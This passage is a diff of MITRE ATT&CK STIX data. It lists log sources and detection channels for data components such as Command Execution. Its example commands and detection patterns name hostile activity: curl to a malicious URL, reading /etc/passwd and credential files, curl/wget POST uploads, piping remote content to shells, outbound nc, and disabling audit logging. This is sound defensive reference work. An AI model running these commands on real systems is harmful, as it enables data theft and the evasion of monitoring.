+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "certificate added or modified in application credentials"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Read-only configuration review from GUI"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Modify Federation Settings or Update Authentication Policy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PowerShell: Add-MailboxPermission"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "RunMacro"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileUploaded or FileCopied events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
+                        },
+                        {
+                            "name": "macos:jamf",
+                            "channel": "RemoteCommandExecution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Device attached|enumerated VID/PID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages with embedded or shortened URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opendirectoryd crashes or abnormal authentication errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream cleared or truncated"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "quarantine or AV-related subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound messages with attachments from suspicious domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process crash, abort, code signing violations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Configuration profile modified or new profile installed"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "new DHCP configuration with anomalous DNS or router values"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mail or AppleScript subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous keychain access attempts targeting payment credentials"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
+                        },
+                        {
+                            "name": "networkdevice:controlplane",
+                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config push events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed authentication requests redirected to non-standard portals"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "PushNotificationSent"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Failed password or accepted password for SSH users"
+                        },
+                        {
+                            "name": "saas:Airtable",
+                            "channel": "EXPORT: User-triggered data export via GUI or API"
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-volume API calls or traffic via messaging or webhook service"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "User navigated to admin interface"
+                        },
+                        {
+                            "name": "saas:collaboration",
+                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "access.content"
+                        },
+                        {
+                            "name": "saas:email",
+                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
+                        },
+                        {
+                            "name": "saas:finance",
+                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
+                        },
+                        {
+                            "name": "saas:github",
+                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
+                        },
+                        {
+                            "name": "saas:gmail",
+                            "channel": "SendEmail, OpenAttachment, ClickLink"
+                        },
+                        {
+                            "name": "saas:googledrive",
+                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "OAuth2 authorization grants / Admin role assignments"
+                        },
+                        {
+                            "name": "saas:hubspot",
+                            "channel": "contact_viewed, contact_exported, login"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "MFAChallengeIssued"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "WebUI access to administrator dashboard"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Federation configuration update or signing certificate change"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "System API Call: user.read, group.read"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
+                        },
+                        {
+                            "name": "saas:openai",
+                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "DataExport, RestAPI, Login, ReportExport"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "file_upload, message_send, message_click"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "conversations.history, files.list, users.info, audit_logs"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
+                        },
+                        {
+                            "name": "saas:Snowflake",
+                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
+                        },
+                        {
+                            "name": "saas:teams",
+                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "unusual web session tokens and automation patterns during login"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook errors loading or processing custom form templates"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule execution failure or abnormal rule execution context"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "SCCM, Intune logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule creation, form load, or homepage redirection"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange logs or header artifacts"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=6416"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1102"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Device started/installed (UMDF) GUIDs"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=104"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1341, 1342, 1020, 1063"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.776000+00:00\", \"old_value\": \"2026-04-24 19:46:47.171000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0064",
+                            "external_id": "DC0064"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Command Execution",
+                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "udev rule reload or trigger command executed"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Use of mv or cp to rename files with '.' prefix"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "gcore, gdb, strings, hexdump execution"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -X POST, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "command line arguments containing lsblk, fdisk, parted"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -d, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "grep/cat/awk on files with password fields"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "git push, curl -X POST"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of setfattr or getfattr commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of chattr to set +i or +a attributes"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl or wget with POST/PUT options"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -T, rclone copy"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect, execve, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call including 'nohup' or trailing '&'"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, execve"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: iptables, nft, firewall-cmd modifications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying local mail filter configuration files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: openssl pkcs12, certutil, keytool"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, USER_CMD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Command line arguments including SPApplicationsDataType"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of tools like cat, grep, or awk on credential files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of xev, xdotool, or input activity emulators"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start/modify"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
+                        },
+                        {
+                            "name": "auditd:USER_CMD",
+                            "channel": "USER_CMD"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SSM RunCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "command-line execution invoking credential enumeration"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ssm:GetCommandInvocation"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Intune PowerShell Scripts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
+                        },
+                        {
+                            "name": "Command",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "docker:api",
+                            "channel": "docker logs access or container inspect commands from non-administrative users"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "docker exec or docker run with unexpected command/entrypoint"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "container exec rm|container stop --force"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "useradd or /etc/passwd modified inside container"
+                        },
+                        {
+                            "name": "EDR:AMSI",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "EDR:cli",
+                            "channel": "Command Line Telemetry"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of config files or shell command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "shell access or job registration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "logline inspection"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli network firewall set commands"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "event stream"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "scp/ssh used to move file across hosts"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli system syslog config set or reload"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Command Execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "remote CLI + vim-cmd logging"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution + payload hints"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "snapshot create/copy, esxcli"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "interactive shell"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "invoked remote scripts (esxcli)"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "base64 or gzip use within shell session"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "scripts or binaries with misleading names"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "openssl|tar|dd"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI usage logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Command execution trace"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Access/Command Execution"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli software vib list"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI session activity"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system shutdown or reboot invoked"
+                        },
+                        {
